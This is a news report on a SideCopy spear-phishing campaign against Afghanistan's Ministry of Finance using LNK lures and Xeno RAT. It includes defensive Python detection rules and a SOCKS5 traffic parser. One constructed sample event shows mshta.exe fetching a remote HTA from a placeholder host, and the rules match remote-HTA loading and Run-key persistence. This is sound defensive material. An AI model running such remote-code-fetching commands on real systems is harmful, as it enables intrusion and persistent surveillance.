Cybersecurity researchers have uncovered a sophisticated spear-phishing campaign attributed to the Pakistan-linked threat group SideCopy, targeting Afghanistan’s Ministry of Finance and other government institutions. The attackers are deploying an open-source remote access trojan (RAT) known as Xeno RAT to compromise systems and gain unauthorized access to sensitive information.
Operation XENOFISCAL: A Targeted Cyber Espionage Campaign
According to researchers at Seqrite Labs, the campaign—dubbed Operation XENOFISCAL—begins with a carefully crafted spear-phishing email containing a ZIP archive. Inside the archive is a malicious Windows Shortcut (LNK) file disguised with a Pashto-language filename designed to appear legitimate to Afghan government personnel.
The operation primarily targets:
- Afghanistan’s Ministry of Finance
- Provincial revenue and finance directorates
- Pashto-speaking government officials
- Provincial-level government employees
The use of Pashto, one of Afghanistan’s primary official languages, highlights the attackers’ understanding of the local environment and their effort to increase the likelihood of successful compromise.
SideCopy’s Expanding Threat Landscape
SideCopy is a Pakistan-aligned cyber threat group operating under the broader Transparent Tribe (APT36) umbrella. The group has a history of conducting espionage-focused cyber operations across South Asia and is known for deploying multiple malware families to steal sensitive information.
Earlier in 2025, security researchers linked SideCopy to attacks against Indian organizations using malware such as Xeno RAT, Spark RAT, and CurlBack RAT. The latest campaign against Afghan government entities appears to be part of the group’s ongoing efforts to expand its regional cyber espionage activities.
How the Attack Works
The infection chain begins when a victim executes the malicious LNK file. The shortcut abuses the legitimate Windows utility mshta.exe to retrieve a remote HTML Application (HTA) hosted on a compromised Afghan educational website.
Once retrieved, the HTA executes heavily obfuscated JavaScript directly in memory rather than from a file written to disk, which reduces the footprint available to file-based detection and helps the attackers evade it.
The malware then:
- Establishes persistence through Windows Registry modifications.
- Masquerades as Microsoft Edge components.
- Deploys a DLL-based loader.
- Installs Xeno RAT version 1.8.7.
- Displays a decoy document to distract the victim and reduce suspicion.
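To show what this chain looks like from the defender's side, here is an added example of triage rules run over constructed Sysmon-style endpoint events. It is not code from the report or from Seqrite Labs: the event field names (Image, ParentImage, CommandLine, TargetObject, Details) follow Sysmon's conventions, the Edge install directories are assumed defaults, and every hostname, SID and path in the sample events is a placeholder. The rules flag the three observable steps the text describes: mshta.exe loading a remote HTA, a Run-key write for persistence, and a binary posing as Microsoft Edge outside Edge's real install location.

```python
import re
from dataclasses import dataclass

# Assumption: default Microsoft Edge install directories; extend for non-standard deployments.
EDGE_LEGIT_DIRS = (
    "c:\\program files\\microsoft\\edge\\application\\",
    "c:\\program files (x86)\\microsoft\\edge\\application\\",
)
# Autostart locations: ...\CurrentVersion\Run and ...\CurrentVersion\RunOnce under HKLM or HKU.
RUN_KEY_RE = re.compile(r"\\currentversion\\run(?:once)?\\", re.IGNORECASE)
# A remote HTA source on the mshta.exe command line: an http(s) URL or a UNC path.
REMOTE_RE = re.compile(r"(?:https?://|\\\\)\S+", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def _edge_lookalike(path: str) -> bool:
    """True when a path names an msedge binary outside the known Edge install directories."""
    p = path.lower().strip('"')
    return "msedge" in p and not any(p.startswith(d) for d in EDGE_LEGIT_DIRS)


def triage_event(event: dict) -> list:
    """Apply the chain-specific rules to one event and return its findings (possibly empty)."""
    findings = []
    if event.get("type") == "process_create":
        image = event.get("Image", "").lower()
        parent = event.get("ParentImage", "").lower()
        cmd = event.get("CommandLine", "")
        if image.endswith("\\mshta.exe"):
            remote = REMOTE_RE.search(cmd)
            if remote:
                findings.append(Finding(
                    "mshta_remote_hta",
                    f"mshta.exe (parent {parent}) loading {remote.group(0)}"))
        if _edge_lookalike(image):
            findings.append(Finding("edge_masquerade_process", image))
    elif event.get("type") == "registry_set":
        target = event.get("TargetObject", "")
        details = event.get("Details", "")
        if RUN_KEY_RE.search(target):
            findings.append(Finding("run_key_persistence", f"{target} = {details}"))
            if _edge_lookalike(details):
                findings.append(Finding("edge_masquerade_run_key", details))
    return findings


def rules_fired(events: list) -> list:
    """Return (event_index, rule_name) pairs for every rule that fired across the event list."""
    return [(i, f.rule) for i, e in enumerate(events) for f in triage_event(e)]


# Constructed sample events (not real telemetry); hostnames, SIDs and paths are placeholders.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://compromised-site.example/page.hta"},
    {"type": "registry_set",
     "TargetObject": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate",
     "Details": r"C:\Users\user\AppData\Roaming\MicrosoftEdge\msedge.exe"},
    {"type": "process_create",  # genuine Edge launch from its real install path: should stay silent
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "msedge.exe"},
    {"type": "process_create",  # Edge-named binary running from a user profile directory
     "Image": r"C:\Users\user\AppData\Roaming\MicrosoftEdge\msedge.exe",
     "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "msedge.exe"},
]

if __name__ == "__main__":
    for idx, rule in rules_fired(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Run as a script it reports the mshta download in event 0, the Run-key write and the Edge-lookalike value in event 1, and the misplaced msedge.exe in event 3, while the genuine Edge launch in event 2 produces nothing. Correlating the first two rules on the same host within a short window is a stronger signal than either alone.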
Xeno RAT Capabilities
Xeno RAT is a powerful remote access trojan that communicates with attacker-controlled servers over TCP connections. It provides threat actors with extensive control over infected systems.
Key capabilities include:
- Executing commands remotely
- Loading and running external DLL modules
- File management and data exfiltration
- Scheduled task creation for persistence
- Antivirus reconnaissance
- SOCKS5 proxy-based network tunneling
- Keystroke logging
- Screenshot capture
- Clipboard monitoring
- Webcam and microphone surveillance
- Removal of persistence mechanisms
- Self-uninstallation to erase traces of infection
These features make Xeno RAT a versatile tool for long-term surveillance and intelligence-gathering operations.
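Because the capability list above includes SOCKS5 proxy tunnelling, a network defender may want to recognise a SOCKS5 handshake in captured traffic on a host that has no business acting as a proxy. The following is an added example, not code from the report, Seqrite Labs or the Xeno RAT project: it assumes the tunnel uses standard RFC 1928 framing (the article does not describe Xeno RAT's wire format), and the flow payloads it parses are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

SOCKS_VERSION = 5
COMMANDS = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}


@dataclass(frozen=True)
class Socks5Request:
    command: str
    host: str
    port: int


def parse_greeting(data: bytes) -> Optional[List[int]]:
    """Return the offered auth methods if `data` is a SOCKS5 client greeting (VER NMETHODS METHODS), else None."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    n = data[1]
    if n == 0 or len(data) < 2 + n:
        return None
    return list(data[2:2 + n])


def parse_request(data: bytes) -> Optional[Socks5Request]:
    """Parse a SOCKS5 request (VER CMD RSV ATYP DST.ADDR DST.PORT); None if it is not one."""
    if len(data) < 4 or data[0] != SOCKS_VERSION or data[2] != 0:
        return None
    command = COMMANDS.get(data[1])
    if command is None:
        return None
    atyp = data[3]
    if atyp == 1:                      # IPv4, 4 octets
        addr_end = 8
        if len(data) < addr_end:
            return None
        host = str(ipaddress.IPv4Address(data[4:8]))
    elif atyp == 3:                    # domain name, one length byte then the name
        if len(data) < 5:
            return None
        addr_end = 5 + data[4]
        if len(data) < addr_end:
            return None
        host = data[5:addr_end].decode("ascii", errors="replace")
    elif atyp == 4:                    # IPv6, 16 octets
        addr_end = 20
        if len(data) < addr_end:
            return None
        host = str(ipaddress.IPv6Address(data[4:20]))
    else:
        return None
    if len(data) < addr_end + 2:
        return None
    port = int.from_bytes(data[addr_end:addr_end + 2], "big")
    return Socks5Request(command, host, port)


def looks_like_socks5_tunnel(payloads: List[bytes]) -> Optional[Socks5Request]:
    """Given the first two payloads sent by one side of a flow, return the proxied destination if they form a SOCKS5 handshake."""
    if len(payloads) < 2 or parse_greeting(payloads[0]) is None:
        return None
    return parse_request(payloads[1])


# Constructed sample flow: greeting offering "no auth", then CONNECT files.corp.example:443.
SAMPLE_FLOW = [
    b"\x05\x01\x00",
    b"\x05\x01\x00\x03" + bytes([18]) + b"files.corp.example" + b"\x01\xbb",
]

if __name__ == "__main__":
    print(looks_like_socks5_tunnel(SAMPLE_FLOW))
```

One caveat when applying this to RAT traffic: in a reverse-proxy arrangement the command-and-control server, not the infected host, plays the SOCKS client, so the greeting and request travel server-to-host and the parser must be run on both directions of the flow. Pair a hit with process attribution (which binary owns the socket) to separate an implant from a legitimate proxy client.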
Related Transparent Tribe Activity Targets Indian Military
The disclosure comes amid reports of another targeted phishing campaign linked to Transparent Tribe, this time aimed at India’s military and defense ecosystem.
Researchers discovered that attackers were using malicious Linux .desktop files disguised as contract-related documents connected to armored vehicle procurement projects. The campaign reportedly relied on WhatsApp-based social engineering tactics to lure victims into opening the malicious files.
Once executed, the infected launcher initiated a complex, multi-stage infection chain involving obfuscated shell scripts and the deployment of a Golang-based malware implant dubbed DeskRAT.
Security analysts believe the campaign was specifically designed to target individuals associated with India’s military infrastructure and defense procurement operations.
Growing Cyber Tensions in South Asia
The latest findings underscore the increasing sophistication of cyber espionage campaigns across South Asia. Threat actors are leveraging localized social engineering tactics, region-specific language lures, and advanced malware frameworks to infiltrate government and defense organizations.
As groups such as SideCopy and Transparent Tribe continue refining their tactics, organizations in the region must remain vigilant by strengthening email security, implementing endpoint detection solutions, and conducting regular cybersecurity awareness training to mitigate the risks posed by targeted phishing attacks.

What stood out to me is how the attackers tailored the campaign with Pashto-language lures and disguised LNK files, which shows a strong focus on social engineering rather than just technical exploitation. For organizations in similar environments, this is a good reminder that monitoring shortcut-file attachments and reinforcing phishing awareness can be just as important as traditional malware defenses.